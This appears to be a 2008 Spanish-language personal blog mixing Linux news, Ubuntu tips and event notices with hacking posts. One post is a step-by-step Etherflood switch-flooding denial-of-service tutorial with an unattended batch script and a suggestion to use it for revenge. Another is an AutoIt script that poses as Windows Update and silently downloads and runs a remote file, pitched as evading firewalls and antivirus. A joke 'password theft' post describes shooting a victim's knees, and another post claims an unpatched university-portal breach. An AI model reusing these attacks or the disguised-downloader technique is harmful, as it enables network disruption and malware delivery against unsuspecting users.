sábado, 20 de septiembre de 2008

Festival GNU 2008 en Chihuahua

Los días 2, 3 y 4 de Octubre se llevará a cabo una serie de conferencias con grandes exponentes y activistas de la comunidad GNU/LINUX. Estas conferencias tendrán sede en el edificio de Seminarios de la facultad de Contaduría y Administración de la UACH.


* No tendrá consto alguno
* Para asistir es necesario registrarse en la web oficial
* Si tienes alguna pregunta, no dudes en hacerla en el formulario de la pagina



La pagina oficial es: http://festivalgnu.fca.uach.mx/

Ayá nos vemos !!

sábado, 26 de julio de 2008

Cliente SSH y TELNET para tu celular

Aqui les traigo una manera muy facil y divertida de controlar sus computadoras con Linuz-Mac o cualquier sistema operativo que tenga el puerto 22 (SSH) a la escucha.

En realidad esto es muy facil, tanto que no te toma mas de 5 minutos en configurarlo, solo necesitas:

CLIENTE:
* Celular con soporte para java
* Aplicacion MidpSSH (cliente SSH y TELNET)

SERVIDOR:
*Computadora con servidor ssh
* puerto 22 a la escucha

Tienen que tener muy en cuenta lo siguiente, dependiendo de la forma, es decir el dispositivo que uses para conectarte a internet tiene que asegurarte que tu demonio sea visto desde "afuera" de la red hacia internet, el termino clave de esta cuestion es NAT, es decir que las direcciones sean traducidas, para esto hay que manosear nuestro router o lo que sea que uses para conectarte a internet (en otras palabras usuarios de Cablemas que tengan el cablemodem con una ip interna tipo 10.b.c.d no podran hacerlo) con el objeto de hacer que nuestra maquina y mas especificamente este servicio sea visto desde "afuera" y no solamente dentro de la red local.

El programa que vamos a usar es el MidpSSH que está en descarga gratuita de la pagina oficial: http://www.xk72.com/midpssh/index.php , luego conectas el cel a la compu y copias el jar, lo instalas y ahora pasamos a la configuracion del programa dentro del celular.
Una vez que lo tienes instalado lo abres, te vas a "Sessions" y creas una sesion nueva:
---En Alias pones el nombre que quieras.

---Ahora en host pones tu direccion ip externa no la de tu maquina, tiene que ser la externa. Atencion aquí, esta no es la idea, aqui se pierde mucho la simplicidad de la cuestion porque tendriamos que estar sabiendo nuestra ip todo el tiempo he aqui la importancia de registrarnos en www.dyndns.com es gratis y ademas es muy util cuando estamos lejos de nuestra compu y queremos encontrarla porque necesitamos algo.

--- En type seleccionamos SSH

--- Luego username y password esta bastante claro lo que es guardamos todo y seleccionamos la sesion recien creada, nos pregunta si le damos permiso para que el programa se conecte a internet y le ponemos que si y dependiendo como este el trafico de la red se toma unos segundos y luevo vemos la pantalla de bienvenida de la terminal de nuestra shell ssh remota y tenemos en el caso de habernos conectado como root un acceso total a nuestra maquina desde donde sea que estemos y listo, ahora a vaciar todos los comandos que sepamos sobre el celular ..XD




Salu2!

sábado, 28 de junio de 2008

El problema que tienen los que saben de computadoras ..XD

El problema mas comun que tienen los que saben de computadoras ..



Yo no sufro tanto de este problema (yo si cobro ..XD)

Salu2..

domingo, 22 de junio de 2008

viernes, 13 de junio de 2008

domingo, 8 de junio de 2008

D.O.S ( Denial Of Service) a redes Lan

¡Saludos!, Hoy quiero explicarles otro Ataque de tipo “Denegación de Servicio” (D.O.S.), Si bien, ya he explicado en qué consisten los ataques D.O.S, Aunque les debo un post para tocarlos “más a fondo”.

El ataque de hoy funciona en sistemas Win2000, WinXP y Win2003, y es algo destructivo , (como todos los ataques D.O.S.), pero éste tiene algo en particular, y es que no hay (ó por lo menos no conozco) defensa posible contra él (Si conoces alguna por favor infórmame al respecto), Una vez que empezó, nadie lo detiene, veamos de qué hablo.

Éste tipo de ataque es bastante viejo y nada “ético”, era usado para colapsar el Switch de una Red con direcciones aleatorias Ethernet, y esto causa que algunos Switches empiecen a enviar el tráfico de paquetes a todos los puertos de la LAN, Es decir, hacemos que el Switch funcione como un Hub, para poder nosotros aprovecharnos de esa y Sniffar la Red.

NO voy a enseñar en éste post a cómo Sniffar, eso tocará después, simplemente quiero mostrarles lo fácil que es “Denegarle el servicio” de Internet a una Red Ethernet.

Bien, para colapsar el Switch, necesitaremos un programa llamado Etherflood, “Ether” viene de “Ethernet” y “Flood” de “Inundación”, y lo podemos conseguir directamente aquí

Bien, para lograr que nuestro “Monstrico” funcione, tenemos que agregarle un Driver a la máquina que Infectaremos (Ojo nada permanente, nosotros sabremos parar “la infección” perfectamente), para que ésta ataque al resto de la red, les enseñaré a configurarlo:
Al descomprimirnos Etherflood, tendremos 3 archivos, los cuales son:
1 archivo .sys Archivo de sistema.
1 archivo .exe Nuestro monstruo 8) .
1 archivo .inf el Driver. Bien, instalemos el Driver, para eso vayamos al Panel de control y de ahí nos vamos a “Conexiones de red”, como esto ataca redes Ethernet, seleccionamos “Conexión de área local”, le damos clic secundario y clickeamos sobre Propiedades, justo como en la imagen:

En las propiedades de conexión de área local, clickeamos sobre el botón “Instalar”, en la ventana que nos saldrá, seleccionamos “Protocolo” y clickeamos en “Agregar”:
Ahora saldrá otra ventana llamada “Seleccionar el protocolo de red”, ahí clickeamos sobre “Utilizar disco”, esto a su vez nos llevará a otra ventana en la cual vamos a clickear sobre el botón “Examinar..” buscamos el directorio donde descomprimimos a Etherflood y ahí seleccionamos el Driver llamado “EthDrv.inf” listo, le damos a “Aceptar” a todo y cerramos las “Propiedades de conexión de área local” y estamos listos para atacar.

Etherflood funciona bajo Shells, así que abrimos una y nos dirigimos hacia donde está nuestro programa, y una vez ahí escribimos:

C:\Etherflood\>etherflood

Y nos saldrá lo siguiente:

Nos está pidiendo la autorización para el ataque , es decir, indicarle nuestra tarjeta de red, escribimos lo siguiente:

C:\Etherflood\>1

Pulsamos Enter, y empezará el desastre, la inundación y el colapso del Switch de la red .


Ningún ordenador conectado al Switch podrá acceder a servicios de red mientras nosotros estemos atacando, pero ¡Espera! Hay algo que canta, el Mismo Switch, ¿Alguna vez has visto un arbolito de Navidad con las luces encendidas al ritmo de la música de “I wish you a merry christmas”?, bueno, exactamente lo mismo pasará pero los LEDs del Switch bailarán al ritmo del la inundación de direcciones Ethernet :lol: :lol: , si el Administrador ó cualquier persona pasa cerca, lo más seguro es que se den cuenta, pero igual no sabrán qué está pasando ni qué ordenador está atacando :shock: , así hemos provocado un Denial Of Service.

Esto serviría de venganza, podríamos programar el Administrador de tareas de Windows para que a una hora determinada inunde el Switch de la red, ó bien con el comando AT de Windows, ó agregar un nuevo valor en el Registro :badgrin: , pero recuerden, La idea no es dañar sino aprender.

¿Ejecutarlo sin intervención Humana?

Claro que es posible, aquí les dejo un Script Batch para eso, para que "A tal hora" un programa por ahí llamado Etherflood se ejecute sin necesidad de alguien que le indique el parámetro "1".

Cita:

@echo off
@echo 1 | C:\Etherflood\etherflood.exe

¿Para parar el ataque?
¡Hombre! Sólo cierra la shell que está atacando ó presiona ctrl. + C, ó si la ejecutaste en modo oculto, termina el proceso por Taskkill.



martes, 27 de mayo de 2008

Pagina de seguridad para practicar hacking (Starfleet Academy)


Aqui les dejo una pagina de seguridad informatica (http://isatcis.com/ ), realmente interesante para hackers, webmasters, y aficionados al hacking.

En esta pagina tienes la opotunidad de aprender y mejorar los conocimiento sobre la seguridad de internet Legalmente. en esta web tendras que aplicar las tacticas mas utilizadas de busqueda de bugs en 16 niveles de seguridad

Reglas:

*Utilizar Mozilla firefox como navegador para las practicas de seguridad (fue optimizado para este navegador)

* Se recomienda encarecidamente el establecimiento de su navegador de Internet a "Active Scripting"


* tratar de crackear o buscar bugs mas aya de los establecidos por los niveles de seguridad permitidos por el administrador ESTA PROHIBIDO

* Brute force, (fuerza bruta), o solisitar paginas excesivas desde el navegador ESTA PROHIBIDO (ten en cuenta que esto no es necesario para explotar los bugs de la web)

* Dar soluciones a los niveles, contraseñas o cualquier sourcecodes ESTA PROHIBIDO.

* Dar enlaces a herramientas necesarias para un nivel ESTA PROHIBIDO.



una sugerencia :
revisar codigo fuente ..XD


saludos y que tengan un buen hacking ..XD

domingo, 25 de mayo de 2008

El rap del diseñador web




The SEO Rapper - Design, Coding

Your site design is the first thing people see
it should be reflective of you and the industry
easy to look at with a nice navigation
when you can't find what you want it causes frustration
a clear Call to action to increase the temptation
use appealing graphics they create motivation
if you have animation please use with moderation
cause search engines can't index the information
display the logos of all your associations
highlight your contact info that's an obligation
create a clean design you can use some decoration
but to try to prevent any client hesitation
every page that they click should provide an explanation
should be easy to understand like having a conversation
when you design the style go ahead and use your imagination
but make sure you use correct color combinations
do some investigation, look at other organizations
but don't duplicate or you might face a litigation
you are done? congratulations, start construction
move into production, please follow these instructions
your photoshop functions? then slice that design
do your layout with divs make sure that it's aligned
please don't use tables even though they work fine
when it come to indexing they give searches a hard time
make it easy for the spiders to crawl what you provide
remove font type, font color and font size
no background colors, keep your coding real neat,
tag your look and feel on a separate style sheet
better results with xml and css
now you making progress, a lil closer to success
describe your doctype so the browser can relate
make sure you do it great or it won't validate
check in all browsers, I do it directly
gotta make sure that it renders correctly
some use IE, some others use Flock
some use AOL, I use Firefox
title everything including links and images
don't use italics, use emphasis
don't use bold, please use strong
if you use bold that's old and wrong
when you use CSS, you page will load quicker
client satisfied like they eating on a snicker
they stuck on your page like you made it with a sticker
and then they convert now that's the real kicker
make you a lil richer, your site a lil slicker
design and code right man I hope you get the picture
what I'm telling you is true man it should be a scripture
if it's built right you'll be the pick of the litter
everyone will want to follow you like twitter
competition will get bitter and you'll shine like glitter
if you trying to grow your company will get bigger
design and code right man can you get with it

El rapero SEO - Diseña, escribe código

El diseño de tu web es lo primero que ve la gente
debería reflejar lo que eres y tu industria
agradable de ver y con buena navegación
no encontrar lo que buscas causa frustración
una llamada a la acción para aumentar la tentación
usa gráficos atractivos, crean motivación
si usas animaciones, por favor, hazlo con moderación
porque los buscadores no pueden indexar la información
muestra los logos de todas tus asociaciones
descata tu información de contacto, es una obligación
crea un diseño limpio, puedes usar alguna decoración
pero intenta evitar la vacilación de los clientes
cada página en la que hacen clic debería mostrar una explicación
debería ser fácil de entender, como tener una conversación
cuando diseñes el estilo usa tu imaginación
pero asegurate de usar combinaciones de colores adecuadas
investiga algo, echa un vistazo a otras organizaciones
pero no plagies o puedes enfrentarte a un juicio
¿has terminado? felicidades, empieza a construir
después a producción, por favor sigue estas instrucciones
¿funciona en photoshop? entonces sigue con ese diseño
usa divs para componer, asegurate de que está alineado
por favor no uses tablas aunque funcione con ellas
cuando se trata de indexar dan problemas a los buscadores
facilita a los spiders indexar tus páginas
elimina el font-type, font-color y font-size
nada de background-color, mantén tu código limpio,
conserva el aspecto en una hoja de estilo
tendrás mejores resultados con xml y css
ahora haces progresos, estás un poco más cerca del éxito
describe tu doctype para que el navegador lo pueda identificar
asegurate de que lo haces todo bien o no validará
prueba la web en todos los navegadores
hay que asegurarse de que se ve correctamente
algunos usan IE, otros usan Flock
unos AOL, yo uso Firefox
añade un title a todo, incluyendo enlaces e imágenes
no uses itálicas, usa énfasis (NT: em en lugar de it)
no uses bold, por favor, usa strong (NT: strong en lugar de b)
usar bold es antiguo y erróneo
al usar CSS, tu página carga más rápido
los clientes están satisfechos
se quedan en tu página como si tuviera adhesivo
y logras una conversión, eso es lo realmente importante
hacerte un poco más rico
diseña y escribe código bien, colega, espero que lo hayas cogido
lo que te digo es cierto, debería ser tu biblia
si está bien desarrollado serás al que escojan
todo el mundo querrá seguirte, como twitter
la competencia se joderá y brillarás como el oro
si intentas crecer tu compañía se hará más grande
diseña y escribe código bien, colega, lo puedes hacer



FUENTE

sábado, 24 de mayo de 2008

Comandos Utiles para Ubuntu

Algunos comandos utiles que pueden ser utiles a la hora de administrar nuestros sistemas con Ubuntu .. XD

Comando Para Privilegios.


sudo command – ejecuta command como raíz
sudo su – abrir shell raíz
sudo su user – abrir shell como usuario
sudo -k – olvidar tu contraseña sudo
gksudo command – visual sudo dialog (GNOME)
kdesudo command – visual sudo dialog (KDE)
sudo visudo – editar /etc/sudoers
gksudo nautilus – gestor ficheros raíz (GNOME)
kdesudo konqueror – gestor ficheros raíz (KDE)
passwd – cambiar tu contraseña


Comandos Network

ifconfig – muestra información de red
iwconfig – muestra información de wireless
sudo iwlist scan – escanea redes inalámbricas
sudo /etc/init.d/networking restart – resetear la red
(archivo) /etc/network/interfaces – configuración manual
ifup interface – traer interface online
ifdown interface – deshabilitar interface


Comandos de Display

sudo /etc/init.d/gdm restart – resetear X (Gnome)
sudo /etc/init.d/kdm restart – resetear X (kDE)
(archivo) /etc/X11/xorg.conf – mostrar Configuracion
sudo dpkg-reconfigure -phigh xserver-xorg – resetear configuración X
Ctrl+Alt+Bksp – resetear X display si quedo tildado
Ctrl+Alt+FN – cambiar a tty N
Ctrl+Alt+F7 – cambiar de nuevo a X display


Comandos de Servicio del Sistema

start service – iniciar trabajo service (Upstart)
stop service – parar trabajo service (Upstart)
status service – comprobar si service está ejecutando (Upstart)
/etc/init.d/service start – iniciar service (SysV)
/etc/init.d/service stop – parar service(SysV)
/etc/init.d/service status – comprobar service(SysV)
/etc/init.d/service restart – resetear service(SysV)
runlevel – obtener runlevel actual


Comandos para Cortafuegos

ufw enable – activar el cortafuegos
ufw disable – apagar el cortafuegos
ufw default allow – permitir todas las conexiones por defecto
ufw default deny – bloquear todas las conexiones por defecto
ufw status – reglas y estado actual
ufw allow port – permitir tráfico en puerto
ufw deny port – bloquear puerto
ufw deny from ip – bloquear dirección ip


Comandos de Sistema

recovery – Escribir “REISUB” mientras se mantiene Alt y SysRq (PrintScrn) con aprox. 1 segundo entre cada letra. Tu sistema reiniciará
lsb_release -a – obtener la versión de Ubuntu
uname -r – obtener versión del kernel
uname -a – obtener toda la información del kernel


Comandos para Gestor de Paquetes

apt-get update – refrescar actualizaciones disponibles
apt-get upgrade – actualizar todos los paquetes
apt-get dist-upgrade – actualizar versión
apt-get install pkg – instalar pkg
apt-get remove pkg – desinstalar pkg
apt-get autoremove – eliminar paquetes obsoletos
apt-get -f instal – intentar arreglar paquetes
dpkg –configure -a – intentar arreglar paquetes rotos
dpkg -i pkg.deb – instalar archivo pkg.deb
(archivo) /etc/apt/sources.list – lista de repositorios APT


Comandos Para Paquetes Especiales

ubuntu-desktop – Entorno Ubuntu estándar
kubuntu-desktop – escritorio KDE
xubuntu-desktop – escritorio XFCE
ubuntu-minimal – núcleo utilidades Ubuntu
ubuntu-standard – utilidades estándar Ubuntu
ubuntu-restricted-extras – no libres, pero utiles
kubuntu-restricted-extras – ídem KDE
xubuntu-restricted-extras – ídem XFCE
build-essential – paquetes usados para compilar
linux-image-generic – última imagen genérica del kernel
linux-headers-generic – últimas cabeceras


Comandos de Aplicaciones

nautilus – gestor de ficheros (GNOME)
dolphin – gestor de ficheros (KDE)
konqueror – Navegador web (KDE)
kate – editor de texto (KDE)
gedit – editor de texto (GNOME)

fuente: http://gndx.org/?p=249

Ballmer mal recibido en Budapest

.. .
le llovieron guevazos a Steve Ballmer cuando iniciaba una conferencia, a causa de esto se tuvo que esconder detraz del estrado para protegerse del atacante, que le gritaba:"Microsoft devuelva el dinero de los contribuyentes", protestaba contra el reciente acuerdo firmado entre esa empresa informática y el gobierno húngaro.

jueves, 22 de mayo de 2008

VirtualBox kernel driver error (solucion)

cuando recien instalamos una maquina virtual en Ubuntu 8.04 y queremos instalar un nuevo sistema operativo nos muestra un error como este:

The VirtualBox kernel driver is not accessible to the current user. Make sure that the user has write permissions for /dev/vboxdrv by adding them to the vboxusers groups. You will need to logout for the change to take effect..
VBox status code: -1909 (VERR_VM_DRIVER_NOT_ACCESSIBLE).


Result Code:
0x80004005
Component:
Console
Interface:
IConsole {1dea5c4b-0753-4193-b909-22330f64ec45}

Esto es por que no tenemos permisos de usar el driver para las makinas virtuales. LO que tenemos que hacer en este caso es agregar a vboxusers al grupo de secion actual. En mi caso mi inicio de secion es "villatux"

Para hacerlo en modo grafico nos vamos a Sistema/Administracion/Usuarios y grupos.
- ahi seleccionamos gestionar grupos
- localizamos vboxusers y lo agregamos a la secion actual "villatux"

y con esto queda listo.

Para hacerlo de una manera mas segura, agregamos al grupo de uauarios manualmente, para hacer esto hacemnos un backup de el archivo de grupos y usuarios con este comando:
sudo cp /etc/group /etc/group.bak
ya hecho el backup ahora si modificamos el archivo con este comando
sudo gksu gedit /etc/group
aqui localizamos vboxusers y le agregamos nuestra sesión después de los dos puntos, asi es como quedo el mio:

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:villatux
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:villatux
fax:x:21:
voice:x:22:
cdrom:x:24:villatux
floppy:x:25:villatux
tape:x:26:
sudo:x:27:
audio:x:29:pulse,villatux
dip:x:30:villatux
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:villatux
sasl:x:45:
plugdev:x:46:villatux
staff:x:50:
games:x:60:
users:x:100:
nogroup:x:65534:
libuuid:x:101:
dhcp:x:102:
syslog:x:103:
klog:x:104:
scanner:x:105:hplip
nvram:x:106:
fuse:x:107:villatux
ssl-cert:x:108:
lpadmin:x:109:villatux
crontab:x:110:
mlocate:x:111:
ssh:x:112:
avahi-autoipd:x:113:
gdm:x:114:
admin:x:115:villatux
pulse:x:116:
pulse-access:x:117:
pulse-rt:x:118:
messagebus:x:119:
avahi:x:120:
netdev:x:121:
polkituser:x:122:
haldaemon:x:123:
villatux:x:1000:
mysql:x:124:
vboxusers:x:125:villatux
peercast:x:126:

una vez hecho esto reiniciamos la sesión con ctrl+alt+Backspace y listo ahora podemos instalar una nueva maquina virtual sin problemas.

martes, 20 de mayo de 2008

Compilar kernel de linux en Ubuntu 7.04

aqui les dejo un video de como compilar el kernel de linux en Ubuntu..



Saludos.

miércoles, 14 de mayo de 2008

InstallFest 2008 en Chihuahua

Se va a organizar un InstallFest el día 17 de Mayo del 2008 en La ciudad de Chihuhua, la sede será en el Edificio de Seminarios de la Facultad de Contaduría y Administración a partir de las 12 horas.

*Podrás traer tu Desktop o Portátil para Instalarle LInux o Software Linbre
*Aprende a Instalar Linux desde cero en tu propia computadora
*Aprende a manejar tu sistema Linux
*Comparaciones de Linux-Windows
*Únete a grupos de usuarios Linux locales
*Comparte información.Notas:
* El evento es totalmente Libre y gratuito
* Si Vas a instalar Linux en tu computadora, procura traer una partición de mas de 4GB para instalarle Linux, (Si no sabes hacerla, no te preocupes, nosotros te ayudamos el día del evento)Paginas con información relacionada:
http://installfest.mx.vg/ <-- registro e infohttp://calendario.fsl.org.mx/mediawiki/index.php/Eventos <-- calendario de FSL.Los que puedan asistir, ahí nos vemos!

domingo, 11 de mayo de 2008

Script au3 para bajar un archivo simulando Windows Update


AutoIt es un Lenguage en script para la automatización de tareas para Windows.

AutoIt ha estado usandose polularmente desde 1999 y sigue ndo a los usuarios y administradores una manera fácil de secuencia de comandos de Windows GUI.

febrero de 2004 la última versión de AutoIt - conocido como AutoIt v3 - fue liberada y añadió potentes características de scripting.

AutoIt v3 se desarrolló en un pequeño equipo con la ayuda de los contribuyentes en todo el mundo y ello ha dado lugar a un gran conjunto de archivos de ayuda, ejemplos, foro de soporte, lista de correo, editor de archivos, y de terceros los servicios públicos.

Todo el desarrollo se centra en AutoIt v3 pero v2 seguirá siendo descargable y apoyado como lo es en tal uso generalizado.

Aqui les dejo un script que simula las actualizaciones de windows y descarga a el directorio c:\ publicidad del proximo evento Installfest.

a este script se le puede modificar para crear un programa actualizable sin que tengas que permitir la descarga a tu firewall o antivirus, ya que siendo actualizacion de windows es como si fuera de manera oficial por parte de windows..XD

aqui mi script en executable http://usuarios.lycos.es/villatux/linux/villatux.exe

(si no se descarga, copia el enlace y pegalo en tu navegador )

aqui el codigo (con algunos errores a proposito para evitar los que no quieren aprender):

AutoItSetOption("RunErrorsFatal, 0)


dim $url="http://usuarios.lycos.es/villatux/linux/
dim $filename="publicidad.pdf"
dim $savepath="c:\"

traytop("Windows Update", "Hay actualizaciones para el equipo", 5, 1)
Sleep(5000)
traytip("Windows Update", "Se instalaran automaticamente", 5, 1)
Sleep(5000)
if (URLDownloadToFile($url & $filename, $savepath & $filename))= 1 Then
Run($filename, $savepath, @SW_HIDE )
traytip("Windows Update", "Las actualizaciones se instalaron correctamente.", 5, 1)
Sleep(5000)
Else
traytip("Windows Update", "Intente instalar las actualizaciones nuevamente", 5, 1)
Sleep(5000)
EndIf

y aqui les dejo unas capturas de cuando se esta ejecutando el script:

y por si quieren empezar a programar sus scripts aqui les dejo esta url con manuales oficiales y referencia de funciones

http://www.autoitscript.com/autoit3/docs/
http://www.autoitscript.com/autoit3/docs/functions.htm

y aqui el compilador :

http://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe (6.6MB)

lunes, 5 de mayo de 2008

Conseguir contraseñas: Yahoo, hotmail, gmail, etc

Debido a que mucha gente me ha pedido que publique la manera de como sacar passwords del vecinito, dela novia, del jefe etc. etc.  y pues decidi a publicar este tutorial para ya no tener que estarles diciendo uno por uno.. XD

Este es uno de los metodos que nunca fallan, hasta el momento no existe parche.
Asi que disfrutenlo mientras puedan, no se trata de ningun otro metodo explicado antes.
Requiere de mucha paciencia y esfuerzo pero estos se ven, recompensados..
No se trata del clasico uso de xploit's y keyloggers, etc..etc...Bueno ya no los entretengo mas..
Disfrutenlo...

Primer Paso.
Identificar a la victima, su nombre.

Segundo Paso.
Te pones un pasamontañas y agarras una de estas
Tercer paso
Vas a la casa de la victima, le apuntas y pides su contraseña, si no te la da, le sonas la rodilla, le lanzas un papelito(tambien un lapiz o pluma..Nota.tambien puede utilizar su sangre) y
le dices que apunte su correo y contraseña, si no te la quiere dar le jodes la otra rodilla,(asi sucesivamente...Nota: No dispares a partes vitales, ni a la mano con la que escribe) .
Cuando la escriba..Le das las gracias..

Cuarto Paso.
Por ultimo sales.. y das un portazo.(Entre mas fuerte mejor, que se note que tienes eggs)lo olvidaba...tienes que tomar el papelito...

Quinto Paso.
Vas a tu casa, sacas el papelito..pruebas si en verdad es la contraseña ( hay un 99.999 % que si sea), checas sus mails (fdw, spam). y pones en tu nick..Se sacan contraseñas de Yahoo, hotmail, gmail, etc..etc...Nota: entre mas rudo seas es mejor......

sábado, 3 de mayo de 2008

Vulnerabilidades en portal del Tec II de Chihuahua

Hola.

en esta ocasión les mostraré de una falla que tiene la pagina oficial de nuestro queridísimo Tecnológico de Chihuahua.

Pues se trata de varias vulnerabilidades causadas por el mismo administrador en su servidor. No voy a dar datos precisos por razones de seguridad, pero enseguida les explico en rasgos generales.

Lo que permite las vulnerabilidades:

* Acceso total a la base de datos Mysql

* Lectura y escritura dentro del servidor

Esta vulnerabilidad la pueden (o podían) encontrar ,ya que esta vulnerabilidad esta desde hace casi dos años. En algunos de los enlaces que dejan los profesores, para que descarguen tareas o documentos del servidor, se ve la dirección vulnerable, y por medio de una sencilla búsqueda por el servidor se haya un backup de la base de datos usada para la pagina web, en el cual se pueden encontrar datos importantes y necesarios para el acceso a la modificación del portal por medio de la base de datos.

Sin tanto rollo aquí les dejo unas capturas:



Salu2!

martes, 22 de abril de 2008

Linux superará a la Mac en el escritorio

De acierdo a Hewlett Packard, los envíos de computadoras para el escritorio ejecutando Linux deberían ser mayores que la de los sistemas de Apple en algún momento de este mismo año. Algunos dicen que la empresa de Steve Jobs ya se encuentra en tercer lugar, por detrás de Linux y Windows. "De acuerdo a la investigación del mercado que hemos hecho, este año esperamos ver la participación de Linux en el escritorio exceder a la de la Macintosh", dijeron en HP.

Otra consultora predice que la participación de Linux en el escritorio llegará al 7.5% este 2008.

domingo, 20 de abril de 2008

10 Cosas que solo puedes hacer con Linux

  1. Conseguir y mantener actualizado un sistema completo legalmente sin pagar ningún dinero.
  2. Poder correr diferentes interfaces gráficas si no te gusta la que viene por defecto o no se adecúa a tus necesidades.
  3. Tener control total del hardware del ordenador y saber que no hay puertas secretas traseras en mi software, puestas por compañías de software o gobiernos malintencionados.
  4. No hace falta desfragmentar los discos duros, nunca.
  5. Probar programas, decidir que no me gustan, desinstalarlos y saber que no he dejado basura en un registro que puede ralentizar el mi máquina.
  6. Usar el SO sin necesidad de correr antivirus ni ningún tipo de software anti-espía, y no reiniciar mi ordenador durante meses.
  7. Personalizar lo que quiera, legalmente, incluyendo mis programas favoritos. Y puedo preguntar a los desarrolladores, proponerles ideas y participar en el proceso de diseño/programación de software si quiero.
  8. Usar el mismo hardware durante más de 5 años hasta que realmente necesites reemplazarlo.
  9. Recibir ayuda de cientos de usuarios, expertos y novatos de manera gratuita y desinteresada.
  10. Tener un escritorio con efectos espectaculares, y muy superiores a los de Windows Vista, en un ordenador de hace tres años

domingo, 13 de abril de 2008

165 Aplicaciones corriendo en Linux

Vean este video en donde se presentan 165 aplicaciones corriendo simultaneamente en linux de una manera sencilla.



Be open.. Be linux XD

Nuevo Portal universitario UACH

El nuevo portal de la Universidad Autonoma de Chihuahua incorpora nuevas características que permitirán mantaner un recurso más exhaustivo y permanentemente actualizado, en beneficio tanto de la propia Comunidad Universitaria, como de la sociedad en general.

Entre las grandes y pequeñas mejoras se le han realizado al portal podemos destacar:

En cuanto al contenido:

Contenidos revisados, corregidos y aumentados.
Contenidos organizados en base a criterios de transparencia y acceso a la información pública.

En cuanto al diseño:

Elementos de navegación y orientación en base a mejores prácticas de usabilidad.
Interfaz optimizada para resolucion de 1024 X 768px.
Retícula ampliada para dar cabida a más información.
Diseño apegado a estándares vigentes.
Diseño consistente con el manual de imagen institucional.

En cuanto a la tecnología utilizada:

Esto es una de las cosas que mas me gustan del portal ..XD

Publicación soportada por gestor de contenidos de nivel enterprise.
Publicación con soporte para múltiples medios y formatos.
Elementos dinámicos con enfoques AJAX y web 2.0.
Carga eficiente, operación de bajo impacto en servidor.

En los días venideros se continuará dando de alta nuevos contenidos, así como revisando y rectificando detalles para mejorar el desempeño tanto del sitio como de la infraestructura que lo soporta, por lo que es probable que a lo largo de una o dos semanas se presenten algunas inconsistencias menores en el servicio; un proceso natural que, una vez concluido, redundará en un servicio robusto y confiable.

En breve dará inicio una fase de capacitación dirigida al personal de la Institución que se hará cargo de revisar y, en muchos casos, actualizar directamente la información de su respectiva área; la calendarización se hará del conocimiento de los interesados de manera oportuna.

Un mejor servicio de correo

se mejoró el sistema de correo para presentar el nuevo sistema de correo web que permitirá un manejo más sencillo y ágil del correo, además de proporcionar al usuario nuevos mecanismos contra el molesto SPAM.

Aunque actualmente se encuentra en versión beta (previa a la liberación final), el nuevo correo de la universidad lso administradores dicen que es 100% seguro y funcional

Visitenla y den su punto de vista : www.uach.mx

domingo, 23 de marzo de 2008

Software libre en instituciones publicas


Si quieres hacer algo por tu país


* No gastes en una solución propietaria cuando existe una solución libre con las mismas
características
* Existe una regulación al respecto
* El presupuesto es austero
* La prensa acecha como parvada de aves de rapiña esperando la oportunidad para sacar un
nuevo toallagate
* No cases a tu país con una sola compañía
* Especialmente con compañías que tengan demandas por prácticas monopólicas ante la suprema
corte de su país
* Utiliza preferentemente tecnología mexicana
* Comparte tu tecnología con otras organizaciones
* Se evita volver a inventar la rueda
* Las demás organizaciones pueden hacer lo mismo por la tuya
* Alguien tiene que dar el primer paso
* Da el primer paso


El modelo de negocios de las compañías consultoras

* El gobierno no debe desarrollar software
* La compañía debe invertir recursos para entrar a una licitación
* La compañía que gana la licitación debe invertir recursos para contratar personal
* La compañía que gana el concurso necesita un anticipo con el cual pueda operar durante el
desarrollo del proyecto
* El proyecto se puede prolongar más de lo esperado
* A los accionistas les gustan los coches deportivos
* Mercedes
* BMW
* Pontiac
* Mustang
* La compañía que gana el concurso se puede ir a la banca rota a medio proyecto
* La compañía que gana el concurso busca crear dependencia para obtener proyectos posteriores
por adjudicación directa
* La compañía que gana el concurso busca crear dependencia para obtener contratos de soporte indefinidos



Tenemos que trabajar más duro para convencer a la gente de que tenemos un mejor producto...

implementacion.
http://sandino.araico.net/articulos/software_libre/html/index.html

sábado, 22 de marzo de 2008

¿ Que se espera de Ubuntu 8.04 LTS ?

Cada dos años, Canonical prepara una LTS (Long Term Support). La liberación de una de las mejores distribuciones de Linux de escritorio disponibles en la actualidad. En realidad, esta es la segunda edición de LTS Ubuntu, la primera fue 6.06 (Dapper Drake), publicado el 1 de junio de 2006. Ahora que la versión beta de Ubuntu 8.04 (Hardy Heron) está a la puerta de la esquina creo que es un buen momento para testearlo y ver sus bondades. Esto es un poco de lo que nos trae Ubuntu 8.04 LTS: Cada dos años, Canonical prepara una LTS (Long Term Support). La liberación de una de las mejores distribuciones de Linux de escritorio disponibles en la actualidad. En realidad, esta es la segunda edición de LTS Ubuntu, la primera fue 6.06 (Dapper Drake), publicado el 1 de junio de 2006. Ahora que la versión beta de Ubuntu 8.04 (Hardy Heron) está a la puerta de la esquina creo que es un buen momento para testearlo y ver sus bondades. Esto es un poco de lo que nos trae Ubuntu 8.04 LTS:

El arranque fué rediseñado,automáticamente le ofrece ahora la posibilidad de elegir su idioma deseado y dos nuevas opciones:

• Pruebe Ubuntu sin ningún cambio en su equipo
• Instalar Ubuntu

En versiones anteriores, estas dos opciones son parte de una sola, llamada "Iniciar o Instalar Ubuntu".


En Ubuntu 8,04, descubrirás las nuevas aplicaciones que vienen incluidas. Algunas de ellas son la sustitución de las aplicaciones viejas y las nuevas están aquí para hacernos vida más fácil (y eso es porque la mayoría de ustedes, los usuarios, pregunta por ellos). There are also drastic changes, such as the replacement of Firefox 2 with the new Beta 4 of Firefox 3. También hay cambios drásticos, como la sustitución de Firefox 2 con la nueva versión beta 4 de Firefox. lo que significa no más Firefox 2, pero se puede instalar desde los repositorios si quieres! Echemos un rápido vistazo a las nuevas aplicaciones:

• Seahorse - el nuevo "sheriff de la ciudad", sistema para administrar sus claves de cifrado;
• Transmission - por defecto el cliente de BitTorrent;
